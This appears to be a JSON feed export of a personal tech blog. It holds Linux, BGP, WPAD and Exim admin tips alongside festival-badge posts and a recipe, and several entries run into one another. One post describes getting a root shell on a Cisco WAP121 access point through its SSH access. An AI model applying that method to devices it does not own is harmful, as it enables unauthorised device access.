BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:MD5 Hash failed for (1.2.3.4, 56789)->(1.2.3.5, 179)", "content_html": "When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.
For this the tcpdump option -M can be used to supply the MD5 password when sniffing the traffic of the new peer:
tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179
tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in RFC2385.
In the output you will see md5valid for packets where your password matches the MD5 signature or md5invalid for packets where your password does not match the MD5 signature.
If you see neither md5valid nor md5invalid then the peer did not configure any MD5 BGP password.
If you want to check for mismatching MD5 passwords after you bring up the BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:
MD5 Hash failed for (1.2.3.4, 56789)->(1.2.3.5, 179)", "url": "https://blog.x-way.org/Networking/2013/02/13/Verify-a-BGP-MD5-password-before-session-turnup.html", "tags": ["Networking"], "date_published": "2013-02-13T09:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324193", "title": "Configure unattached Bridge Interfaces in Debian", "content_text": "When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).Debian uses the directive bridge_ports in /etc/network/interfaces to indicate whether an interface is a bridge interface or not.The syntax checker does not accept an empty bridge_ports directive since he expects a list of physical interfaces to attach to the bridge interface.When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.Since I manage /etc/network/interfaces with my Puppet module, I would like to use it to configure all network interfaces including the unattached bridge interfaces.It turns out that this can be done by passing none as parameter for the bridge_ports directive like this:interface br0 inet static\taddress 192.0.2.1\tnetmask 255.255.255.0\tbridge_ports none", "content_html": "
When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).
Debian uses the directive bridge_ports in /etc/network/interfaces to indicate whether an interface is a bridge interface or not.The syntax checker does not accept an empty bridge_ports directive since he expects a list of physical interfaces to attach to the bridge interface.
When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.
Since I manage /etc/network/interfaces with my Puppet module, I would like to use it to configure all network interfaces including the unattached bridge interfaces.
It turns out that this can be done by passing none as parameter for the bridge_ports directive like this:
interface br0 inet static\taddress 192.0.2.1\tnetmask 255.255.255.0\tbridge_ports none", "url": "https://blog.x-way.org/Linux/2013/02/05/Configure-unattached-Bridge-Interfaces-in-Debian.html", "tags": ["Linux"], "date_published": "2013-02-05T08:42:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324192", "title": "Nice-looking templates for HAVP", "content_text": "Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.You can download them from GitHub: https://github.com/x-way/havp-templatesCurrently there is only the german version, feel free to send me a pull-request with another translation :-)", "content_html": "
Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.
You can download them from GitHub: https://github.com/x-way/havp-templates
Currently there is only the german version, feel free to send me a pull-request with another translation :-)
For basic virus protection I'm running a proxy with HAVP and ClamAV.
Since some time I was using HAVPs blacklist functionality to block Ads (by blacklisting *.doubleclick.net and *.ivwbox.de).As such a manual blacklist is not very efficient I wanted to have an auto-updating list of adservers, thus I started to write the shellscript below which generates an up-to-date blacklist based on the adserverlist from pgl.yoyo.org.
Shortly after this I extended the script to also incorporate a Phising blacklist based on the data from PhishTank.
Currently I'm using the version below which runs in a cronjob every two hours and keeps the HAVP blacklist up-to-date. Please note that you need to insert your own free PhishTank API key when using this script.
#!/bin/shcd /etc/havpOUTFILE=/etc/havp/blacklistADSERVERLIST=/etc/havp/adserverlistPHISHTANK=/etc/havp/phishtankMYBLACKLIST=/etc/havp/myblacklistwget -q -N \"http://pgl.yoyo.org/adservers/serverlist.php?hostformat=webwasher;showintro=0;mimetype=plaintext\"sed -e 's_^//_#_g' serverlist.php* | sort | uniq > $ADSERVERLISTwget -q -N http://data.phishtank.com/data/<PhishTank API key>/online-valid.csv.bz2bzcat online-valid.csv.bz2 | sed \\\t-e 's/^[0-9]*,//' \\\t-e 's@,http://www.phishtank.com/phish_detail.php?phish_id=[0-9]*,.*$@@' \\\t-e 's/^\"\\(.*\\)\"$/\\1/' \\\t-e 's_^https\\?://__' \\\t-e 's_/$_/*_' \\\t-e 's_^\\([^/]*\\)$_\\1/*_' \\\t-e 's/?.*/*/' | \\grep -vF 'phish_id,url,phish_detail_url,submission_time,verified,verification_time,online,target' | \\iconv -f utf8 -t ascii -c - | sort | uniq > $PHISHTANKecho \"# blacklist file generated by $0, `date`\" > $OUTFILEecho \"\\n# MYBLACKLIST:\" >> $OUTFILEcat $MYBLACKLIST >> $OUTFILEecho \"\\n# ADSERVERLIST:\" >> $OUTFILEcat $ADSERVERLIST >> $OUTFILEecho \"\\n# PHISHTANK:\" >> $OUTFILEcat $PHISHTANK >> $OUTFILE", "url": "https://blog.x-way.org/Linux/2013/01/01/HAVP-PhishTank-and-Adserver-Blacklist.html", "tags": ["Linux"], "date_published": "2013-01-01T12:50:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324190", "title": "Automatic Proxy Configuration via DHCP", "content_text": "To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using WPAD.For this setup, the following components are needed:A DHCP server which announces DHCP option 252 with the URL of the PAC file (wpad.dat).A webserver which serves the wpad.dat fileA wpad.dat PAC file where the Proxy IP is definedOn a MikroTik system, the DHCP server configuration looks like this:/ip dhcp-server optionadd code=252 name=local-pac-server value=\"http://192.168.0.2:80/wpad.dat\\?\"/ip dhcp-server networkadd address=192.168.0.0/24 dhcp-option=local-pac-server dns-server=192.168.0.1 gateway=192.168.0.1 netmask=24Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.Following the example above, on the machine 192.168.0.2, we serve the following wpad.dat file:function FindProxyForURL ( url, host ) {\treturn \"PROXY 1.2.3.4:8080; DIRECT\";}With this setup, all systems will use the proxy at 1.2.3.4 and if the proxy is not available try to connect directly to the Internet.While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the DIRECT part in an enterprise setup.", "content_html": "
To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using WPAD.
For this setup, the following components are needed:
On a MikroTik system, the DHCP server configuration looks like this:
/ip dhcp-server optionadd code=252 name=local-pac-server value=\"http://192.168.0.2:80/wpad.dat\\?\"/ip dhcp-server networkadd address=192.168.0.0/24 dhcp-option=local-pac-server dns-server=192.168.0.1 gateway=192.168.0.1 netmask=24
Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.
With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.
Following the example above, on the machine 192.168.0.2, we serve the following wpad.dat file:
function FindProxyForURL ( url, host ) {\treturn \"PROXY 1.2.3.4:8080; DIRECT\";}
With this setup, all systems will use the proxy at 1.2.3.4 and if the proxy is not available try to connect directly to the Internet.
While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the DIRECT part in an enterprise setup.
Thanks to the ngx_echo module, it is trivially easy to build a clone of the icanhazip.com service with nginx:
server {\tlisten 80; \tlisten [::]:80;\tlocation / { \t\techo $remote_addr;\t} }", "url": "https://blog.x-way.org/Linux/2012/08/05/icanhazip.com-clone-with-nginx.html", "tags": ["Linux"], "date_published": "2012-08-05T23:58:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324187", "title": "How to get a Rootshell on a Cisco WAP121", "content_text": "The Cisco WAP121 runs a Linux based firmware. This is how you get a Rootshell on it:\tLogin to the Web GUI of the WAP121 and enable the SSH management access\tLogin with SSH and enter this command: shThis probably works with the Cisco WAP321 as well (I only tested with the WAP121).Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: ssh -l root@<WAP121 IP>", "content_html": "
The Cisco WAP121 runs a Linux based firmware. This is how you get a Rootshell on it:
sh
This probably works with the Cisco WAP321 as well (I only tested with the WAP121).
Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: ssh -l root@<WAP121 IP>
After the summer festivals of Sydney, now also the festivals in Switzerland start again.
First one this year: Artiphys 2012
While playing around with my Puppet configuration I discovered that the 'system facts' returned by the Facter helper tool were not consistent on my Debian boxes.
On some machines Facter properly reported all LSB related facts of the system, while on other machines it did not report any such information.
The problem occurred on about 50% of the hosts, so I excluded a bug introduced by manual over-tuning of the system configuration.
Further investigation showed that Facter uses the lsb_release
command to collect the LSB information of the system.
On Debian this command is provided by the lsb-release
package which was only installed on half of my systems...
Now my Puppet manifests include the following configuration directive which should prevent this problem in the future :-)
package { 'lsb-release':\tensure => installed,}", "url": "https://blog.x-way.org/Linux/2012/02/14/Fix-empty-puppet-lsbdistcodename-on-Debian.html", "tags": ["Linux"], "date_published": "2012-02-14T23:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324183", "title": "Big Day Out", "content_text": "One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)Last thursday I went to the Big Day Out festival in Sydney.What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.I really liked the performances of Parkway Drive, Miss Kittin, Röyksopp, Bassnectar, Kasabian, Soundgarden and Regurgitator.Also it was nice to catch a glimpse of The Jezabels, Hilltop Hoods, Kitty, Daisy & Lewis and the show of Kayne West.A bit disapointing was the performance of Cavalera Conspiracy. They even had to fallback to popular Sepultura songs (Refuse/Resist, Roots Bloody Roots) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.Unfortunately the last train back was before the end of the festival and so I did miss Nero.", "content_html": "
One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)
Last thursday I went to the Big Day Out festival in Sydney.
What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.
I really liked the performances of Parkway Drive, Miss Kittin, Röyksopp, Bassnectar, Kasabian, Soundgarden and Regurgitator.
Also it was nice to catch a glimpse of The Jezabels, Hilltop Hoods, Kitty, Daisy & Lewis and the show of Kayne West.
A bit disapointing was the performance of Cavalera Conspiracy. They even had to fallback to popular Sepultura songs (Refuse/Resist, Roots Bloody Roots) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.
Unfortunately the last train back was before the end of the festival and so I did miss Nero.
Listening to Keren Ann is just perfect when you have to work on a rainy Sunday.
Thank you Metropop for showing me her music.
Yesterday after work we had some beers at The Local Taphouse (including some fine porter from BrewDog to increase my shareholder value) and then we went on to go out in some clubs, in shorts and flip-flops.
Astonishingly we had no problems getting inside, anywhere else in the world this would not be possible!
This morning then up again for some early surfing at Bondi before all the tourists arrive.
And now chilling in my Kammok under the trees in the frontyard :-)
This morning I started to prepare the bagagges for my trip to 28C3 and for the two months in Sydney.
While stowing away all my stuff in boxes so I can sublet my room I found old boxes with stuff, which I did stow away over a year ago when I went to Sydney the last time and I've never even thought about since!
As I did not have time to open them today I don't even know what is in those boxes. Probably I should just throw them away when I come back from Sydney, there can't be anything important in there :-)
", "url": "https://blog.x-way.org/Misc/2011/12/24/Packing.html", "tags": ["Misc"], "date_published": "2011-12-24T11:49:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324179", "title": "Open Systems", "content_text": "Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my Open Systems nametag:", "content_html": "Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my Open Systems nametag:
", "url": "https://blog.x-way.org/Badges/2011/12/24/Open-Systems.html", "tags": ["Badges"], "date_published": "2011-12-24T08:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324178", "title": "Soiree BAM", "content_text": "One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): Soiree BAM 2005", "content_html": "One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): Soiree BAM 2005
", "url": "https://blog.x-way.org/Badges/2011/12/23/Soiree-BAM.html", "tags": ["Badges"], "date_published": "2011-12-23T08:43:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324177", "title": "Balelec 2005", "content_text": "There we go, the first year I participated as staff: Festival Balelec 2005", "content_html": "There we go, the first year I participated as staff: Festival Balelec 2005
", "url": "https://blog.x-way.org/Badges/2011/12/22/Balelec-2005.html", "tags": ["Badges"], "date_published": "2011-12-22T06:56:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324176", "title": "Balelec 2006", "content_text": "Luckily this one took place very year (for more than 30 years now!): Festival Balelec 2006", "content_html": "Luckily this one took place very year (for more than 30 years now!): Festival Balelec 2006
", "url": "https://blog.x-way.org/Badges/2011/12/21/Balelec-2006.html", "tags": ["Badges"], "date_published": "2011-12-21T08:11:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324175", "title": "Closedair 2006", "content_text": "Yet another great event which no longer exists: ClosedAir 2006", "content_html": "Yet another great event which no longer exists: ClosedAir 2006
", "url": "https://blog.x-way.org/Badges/2011/12/20/Closedair-2006.html", "tags": ["Badges"], "date_published": "2011-12-20T10:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324174", "title": "LinuxWorld 2007", "content_text": "Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007", "content_html": "Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007
", "url": "https://blog.x-way.org/Badges/2011/12/19/LinuxWorld-2007.html", "tags": ["Badges"], "date_published": "2011-12-19T08:35:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324173", "title": "Artiphys 2008", "content_text": "And there the other student music festival which managed to provide badges: Artiphys 2008", "content_html": "And there the other student music festival which managed to provide badges: Artiphys 2008
", "url": "https://blog.x-way.org/Badges/2011/12/18/Artiphys-2008.html", "tags": ["Badges"], "date_published": "2011-12-18T12:46:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324172", "title": "check_disk_usage.sh", "content_text": "Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.This script checks if a disk is more than 75% full.#!/bin/bashdf -h | awk '/%/ { limit = 75 percent = sprintf(\"%d\",$5) if ( percent > limit ) { print \"Warning: \",$6,\" (\",$1,\") is to \",percent,\"% full:\" print $0 }}'Save it under /root/check_disk_usage.sh and create the following crontab entry to check the disk usage every day at half past midnight.30 0 * * * /root/check_disk_usage.shAssuming your host has configured an MTA and defined a recipient for root@<yourhost>, you should get an e-mail whenever a disk is more than 75% full.", "content_html": "Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.
This script checks if a disk is more than 75% full.
#!/bin/bashdf -h | awk '/%/ { limit = 75 percent = sprintf(\"%d\",$5) if ( percent > limit ) { print \"Warning: \",$6,\" (\",$1,\") is to \",percent,\"% full:\" print $0 }}'
Save it under /root/check_disk_usage.sh and create the following crontab entry to check the disk usage every day at half past midnight.
30 0 * * * /root/check_disk_usage.sh
Assuming your host has configured an MTA and defined a recipient for root@<yourhost>, you should get an e-mail whenever a disk is more than 75% full.
", "url": "https://blog.x-way.org/Linux/2011/12/17/check_disk_usage_sh.html", "tags": ["Linux"], "date_published": "2011-12-17T17:09:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324171", "title": "Balelec 2008", "content_text": "Now on to the badges of 2008, as every year: Festival Balelec 2008", "content_html": "Now on to the badges of 2008, as every year: Festival Balelec 2008
", "url": "https://blog.x-way.org/Badges/2011/12/17/Balelec-2008.html", "tags": ["Badges"], "date_published": "2011-12-17T10:10:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324170", "title": "iPhone PIN bruteforce", "content_text": "(via vowe.net)", "content_html": "(via vowe.net)
", "url": "https://blog.x-way.org/Misc/2011/12/16/iPhone-PIN-bruteforce.html", "tags": ["Misc"], "date_published": "2011-12-16T08:20:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324169", "title": "Caprices 2009", "content_text": "The only time (for now) when I got to fly in a helicopter for a music festival was at: Caprices 2009", "content_html": "The only time (for now) when I got to fly in a helicopter for a music festival was at: Caprices 2009
", "url": "https://blog.x-way.org/Badges/2011/12/16/Caprices-2009.html", "tags": ["Badges"], "date_published": "2011-12-16T08:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324168", "title": "Balelec 2009", "content_text": "And once more there is a badge from: Festival Balelec 2009", "content_html": "And once more there is a badge from: Festival Balelec 2009
", "url": "https://blog.x-way.org/Badges/2011/12/15/Balelec-2009.html", "tags": ["Badges"], "date_published": "2011-12-15T08:37:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324167", "title": "Festival de la terre 2009", "content_text": "Here comes the largest badge in my collection: Festival de la terre 2009", "content_html": "Here comes the largest badge in my collection: Festival de la terre 2009
", "url": "https://blog.x-way.org/Badges/2011/12/14/Festival-de-la-terre-2009.html", "tags": ["Badges"], "date_published": "2011-12-14T12:44:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324166", "title": "Montreux Jazz 2009", "content_text": "Probably the most 'famous' badge in my collection: Montreux Jazz Festival 2009", "content_html": "Probably the most 'famous' badge in my collection: Montreux Jazz Festival 2009
", "url": "https://blog.x-way.org/Badges/2011/12/13/Montreux-Jazz-2009.html", "tags": ["Badges"], "date_published": "2011-12-13T07:44:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324165", "title": "Metropop 2009", "content_text": "With the 2009 badges, I can almost fill another week. Let's start with: Metropop Festival 2009", "content_html": "With the 2009 badges, I can almost fill another week. Let's start with: Metropop Festival 2009
", "url": "https://blog.x-way.org/Badges/2011/12/12/Metropop-2009.html", "tags": ["Badges"], "date_published": "2011-12-12T05:44:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324164", "title": "(Mini) Bacon and Egg Cups", "content_text": "Last week I stumbled upon this delicious looking bacon and egg cups recipe and thought that I should try it sometimes, which I did this morning.Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)Ingredients:1 slice of bread per muffin cup (1 slice per 4 cups for the 'mini' version)2 slices of bacon per muffing cup (use small slices for the 'mini' version)1 egg per muffin cup (same for the 'mini' version)1 tablespoon shredded cheddar cheese per muffin cup (optional, I used some parmesan instead)salt and pepper to tasteDirections:Preheat oven to 375 degrees.(that's 190 degrees celsius)Use a cookie cutter to cut circles out of each piece of bread.Grease a muffin tin and press circles of bread in the muffin cups. Place in the oven and bake for 5 minutes or until bread is slightly toasted. Remove from oven.(be careful when doing the 'mini' version, your bread will be toasted in well under 5 minutes)Cook bacon in a skillet until halfway cooked (approximately 3-4 minutes).(here again: when using small bacon slices they will be ready in less than a minute, be careful to not make them too crispy otherwise they will be hard to fit into the cups)Place 2 slices of bacon on top of the pieces of bread to form a cup (the bacon should cover the bread and the sides of each cup).Crack an egg into each muffin cup (on top of the bacon). It helps to discard a little bit of the egg white after cracking and before pouring into the muffin cup.(for the 'mini' version keep the surplus egg white in a bowl and use it to make some 'only-white' cups, one egg gives enough surplus egg white for another cup)Place in the oven and bake for 18-20 minutes or until the eggs are set.(for the 'mini' version use 8-10 minutes, I almost burned mine!)Sprinkle cheddar cheese over each egg and continue to bake until cheese is melted (this step is optional).Season with salt and pepper to taste and serve.Enjoy!The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)", "content_html": "Last week I stumbled upon this delicious looking bacon and egg cups recipe and thought that I should try it sometimes, which I did this morning.
Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).
This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)
Ingredients:
Directions:
Enjoy!
The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)
", "url": "https://blog.x-way.org/Food/2011/12/11/Mini-Bacon-and-Egg-Cups.html", "tags": ["Food"], "date_published": "2011-12-11T18:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324163", "title": "Caprices 2010", "content_text": "Right at the beginning of spring, in the beautiful mountains of Crans-Montana, there is: Caprices 2010", "content_html": "Right at the beginning of spring, in the beautiful mountains of Crans-Montana, there is: Caprices 2010
", "url": "https://blog.x-way.org/Badges/2011/12/11/Caprices-2010.html", "tags": ["Badges"], "date_published": "2011-12-11T11:35:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324162", "title": "Artiphys 2010", "content_text": "Also this one took place in 2010: Artiphys 2010", "content_html": "Also this one took place in 2010: Artiphys 2010
", "url": "https://blog.x-way.org/Badges/2011/12/10/Artiphys-2010.html", "tags": ["Badges"], "date_published": "2011-12-10T09:36:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324161", "title": "Balelec 2010", "content_text": "Like almost every year, there is a badge from: Festival Balelec 2010", "content_html": "Like almost every year, there is a badge from: Festival Balelec 2010
", "url": "https://blog.x-way.org/Badges/2011/12/09/Balelec-2010.html", "tags": ["Badges"], "date_published": "2011-12-09T00:37:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324160", "title": "Metropop 2010", "content_text": "Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: Metropop Festival 2010", "content_html": "Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: Metropop Festival 2010
", "url": "https://blog.x-way.org/Badges/2011/12/08/Metropop-2010.html", "tags": ["Badges"], "date_published": "2011-12-08T07:44:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324159", "title": "Caprices 2011", "content_text": "And there comes the next music festival: Caprices 2011", "content_html": "And there comes the next music festival: Caprices 2011
", "url": "https://blog.x-way.org/Badges/2011/12/07/Caprices-2011.html", "tags": ["Badges"], "date_published": "2011-12-07T14:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324158", "title": "Artiphys 2011", "content_text": "Another student music festival from EPFL: Artiphys 2011", "content_html": "Another student music festival from EPFL: Artiphys 2011
", "url": "https://blog.x-way.org/Badges/2011/12/06/Artiphys-2011.html", "tags": ["Badges"], "date_published": "2011-12-06T07:45:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324157", "title": "Sat Rocks IV", "content_text": "Again a badge from a music festival: Sat Rocks IV", "content_html": "Again a badge from a music festival: Sat Rocks IV
", "url": "https://blog.x-way.org/Badges/2011/12/05/Sat-Rocks-IV.html", "tags": ["Badges"], "date_published": "2011-12-05T05:20:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324156", "title": "MoleKul'Air", "content_text": "The next badge is from a concert (or rather a series of three concerts): MoleKul'Air", "content_html": "The next badge is from a concert (or rather a series of three concerts): MoleKul'Air
", "url": "https://blog.x-way.org/Badges/2011/12/04/MoleKulAir.html", "tags": ["Badges"], "date_published": "2011-12-04T12:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324155", "title": "Balelec 2011", "content_text": "Another badge from a music festival: Festival Balelec 2011", "content_html": "Another badge from a music festival: Festival Balelec 2011
", "url": "https://blog.x-way.org/Badges/2011/12/03/Balelec-2011.html", "tags": ["Badges"], "date_published": "2011-12-03T12:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324154", "title": "Metropop 2011", "content_text": "Here comes the next badge. This time not from a tech conference but from a music festival: Metropop Festival 2011For insiders, there is also a view of the backside :-)", "content_html": "Here comes the next badge. This time not from a tech conference but from a music festival: Metropop Festival 2011
For insiders, there is also a view of the backside :-)
", "url": "https://blog.x-way.org/Badges/2011/12/02/Metropop-2011.html", "tags": ["Badges"], "date_published": "2011-12-02T08:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324153", "title": "Badges", "content_text": "When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new Badges category in the weblog.My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.Here is the first one, it is from the IPv6 Business Konferenz:", "content_html": "When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.
Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new Badges category in the weblog.
My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.
Here is the first one, it is from the IPv6 Business Konferenz:
The database which previously powered this weblog vanished without a trace two years ago and people only got some PHP/XML error when surfing this site since then. Unfortunately the last backup of the database was more than four years old...
To restore the content of this weblog the Webarchive from Archive.org was parsed with the help of some scripts in order to extract the missing posts. The resulting data was cross-checked with the last database backup and the generated static RSS feed files.
Then all the posts with their meta information were converted and stored in the appropriate format for the new system. Finally the layout was migrated to the new system and some glue files were created in order to provide backwards compatibility for the old link format.
After two months of restore/migration/polishing work the weblog is now online again, powered by jekyll and currently hosted with GitHub Pages.
", "url": "https://blog.x-way.org/Misc/2011/11/26/Online-Again.html", "tags": ["Misc"], "date_published": "2011-11-26T15:47:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324151", "title": "Unfreeze messages in Exim queue", "content_text": "To process all **frozen** messages in the Exim queue use this command:mailq | grep frozen | awk '{print $3}' | xargs exim -v -M", "content_html": "To process all **frozen** messages in the Exim queue use this command:
mailq | grep frozen | awk '{print $3}' | xargs exim -v -M", "url": "https://blog.x-way.org/Linux/2009/07/28/Unfreeze-messages-in-Exim-queue.html", "tags": ["Linux"], "date_published": "2009-07-28T22:25:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324150", "title": "Remove all messages in the Exim queue", "content_text": "To whipe the Exim message queue use the following command:exim -bp | exiqgrep -i | xargs exim -Mrm", "content_html": "
To whipe the Exim message queue use the following command:
exim -bp | exiqgrep -i | xargs exim -Mrm", "url": "https://blog.x-way.org/Linux/2009/03/10/Remove-all-messages-in-the-Exim-queue.html", "tags": ["Linux"], "date_published": "2009-03-10T14:50:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324149", "title": "Prevent Exim4 from using up all disk space on Debian", "content_text": "Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:check_spool_space=100MThis refuses incoming messages with a \"452 Space shortage, please try later\" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.", "content_html": "
Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:
check_spool_space=100M
This refuses incoming messages with a \"452 Space shortage, please try later\" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.
", "url": "https://blog.x-way.org/Linux/2009/03/06/Prevent-Exim4-from-using-up-all-disk-space-on-Debian.html", "tags": ["Linux"], "date_published": "2009-03-06T10:20:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324148", "title": "PDM TODO Performance", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/School/2009/03/04/PDM-TODO-Performance.html", "tags": ["School"], "date_published": "2009-03-04T16:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324147", "title": "Gmail problems", "content_text": "This comment on the Gmail problems made my day:They're testing their new offline feature :)(via)", "content_html": "This comment on the Gmail problems made my day:
They're testing their new offline feature :)
(via)
", "url": "https://blog.x-way.org/Misc/2009/02/24/Gmail-problems.html", "tags": ["Misc"], "date_published": "2009-02-24T13:11:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324146", "title": "Music for a hard wake-up in the morning II", "content_text": "Tagada Jones — Une fois de plus (Industrial Version)", "content_html": "Tagada Jones — Une fois de plus (Industrial Version)
", "url": "https://blog.x-way.org/Music/2009/02/21/Music-for-a-hard-wake-up-in-the-morning-II.html", "tags": ["Music"], "date_published": "2009-02-21T13:28:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324145", "title": "Music for a hard wake-up in the morning", "content_text": "Die Toten Hosen — Strom", "content_html": "Die Toten Hosen — Strom
